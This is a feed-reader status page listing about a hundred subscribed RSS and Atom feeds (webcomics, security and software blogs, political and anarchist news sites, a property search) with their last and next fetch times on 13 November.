Free software jobs XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Full Frontal Nerdity by Aaron Williams XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
General Protection Fault: The Comic Strip XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
George Monbiot XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Girl Genius XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
God Hates Astronauts XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Graeme Smith XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Groklaw XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Hackney Anarchist Group XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
http://cashing-knowledge.jp/?feed=rss2 XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
http://dungeond.com/comic.rss XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
http://dynamic.boingboing.net/cgi-bin/mt/mt-cp.cgi?__mode=feed&_type=posts&blog_id=1&id=1 XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
http://eng.anarchoblogs.org/feed/atom/ XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://feed43.com/3874015735218037.xml XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://feeds2.feedburner.com/GeekEtiquette?format=xml XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
http://fulltextrssfeed.com/feeds2.feedburner.com/uclick/doonesbury?format=xml XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
http://london.indymedia.org/articles.rss XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
http://pipes.yahoo.com/pipes/pipe.run?_id=ad0530218c055aa302f7e0e84d5d6515&_render=rss XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://the-programmers-stone.com/feed/ XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
http://thecommune.co.uk/feed/ XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
http://ubuntuweblogs.org/atom.xml XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://www.airshipentertainment.com/buck/buckcomic/buck.rss XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
http://www.airshipentertainment.com/growf/growfcomic/growf.rss XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
http://www.airshipentertainment.com/myth/mythcomic/myth.rss XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
http://www.amongruins.org/?feed=atom XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
http://www.baen.com/baenebooks XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
http://www.dcscience.net/feed/medium.co XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
http://www.feedsapi.com/makefulltextfeed.php?url=http%3A%2F%2Fwww.somethingpositive.net%2Fsp.xml&what=auto&key=&max=7&links=preserve&exc=&privacy=I+accept XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
http://www.freedompress.org.uk/news/feed/ XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
http://www.goblinscomic.com/category/comics/feed/ XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
http://www.google.com/calendar/feeds/q7s5o02sj8hcam52hutbcofoo4%40group.calendar.google.com/public/basic XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
http://www.steampunkmagazine.com/inside/feed/ XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
http://www.tinycat.co.uk/feed/ XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
https://hackbloc.org/rss.xml XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
https://kajafoglio.livejournal.com/data/atom/ XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
https://kimmo.suominen.com/stuff/dilbert-daily.xml XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
https://philfoglio.livejournal.com/data/atom/ XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
https://studiofoglio.livejournal.com/data/atom/ XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
https://twitter.com/statuses/user_timeline/22724360.rss XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
https://web.randi.org/?format=feed&type=rss XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
https://www.hackneysolidarity.info/rss.xml XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
https://www.newstatesman.com/feeds/blogs/laurie-penny.rss XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
https://www.rightmove.co.uk/rss/property-for-sale/find.html?locationIdentifier=REGION^876&maxPrice=240000&minBedrooms=2&displayPropertyType=houses&oldDisplayPropertyType=houses&primaryDisplayPropertyType=houses&oldPrimaryDisplayPropertyType=houses&numberOfPropertiesPerPage=24 XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Humble Bundle Blog XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
I, Cringely XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Irregular Webcomic! XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Joel on Software XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Judith Proctor's Journal XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Krebs on Security XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Lambda the Ultimate - Programming Languages Weblog XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
LFG Comics XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
LLVM Project Blog XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Loomio Blog XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
LWN.net XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Menage a 3 XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Mimi and Eunice XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Neil Gaiman's Journal XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Nina Paley's Blog XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
O Abnormal – Scifi/Fantasy Artist XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Oglaf! -- Comics. Often dirty. XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Oh Joy Sex Toy XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Order of the Stick XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Original Fiction – Tor.com XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
OSNews XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Paul Graham: Unofficial RSS Feed XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Penny Arcade XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Penny Red XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
PHD Comics XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Phil's blog XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Planet Debian XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Planet GridPP XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Planet Lisp XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Property is Theft! XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
QC RSS XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Scenes From A Multiverse XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Schneier on Security XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
SCHNEWS.ORG.UK XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Scripting News XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Seth's Blog XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Skin Horse XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Starslip by Kris Straub XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Tales From the Riverbank XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
The Adventures of Dr. McNinja XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
The Bumpycat sat on the mat XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
The Command Line XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
The Daily WTF XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
The Monochrome Mob XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
The Non-Adventures of Wonderella XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
The Old New Thing XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
The Open Source Grid Engine Blog XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
The Phoenix Requiem XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
The Rogues Gallery XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
The Stranger, Seattle's Only Newspaper: Savage Love XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
TorrentFreak XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
towerhamletsalarm XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Twokinds XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
UK Indymedia Features XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Uploads from ne11y XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Uploads from piasladic XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Wayward Sons: Legends - Sci-Fi Full Page Webcomic - Updates Daily XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
What If? XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Whatever XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Whitechapel Anarchist Group XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
WIL WHEATON dot NET XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
wish XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
xkcd.com XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November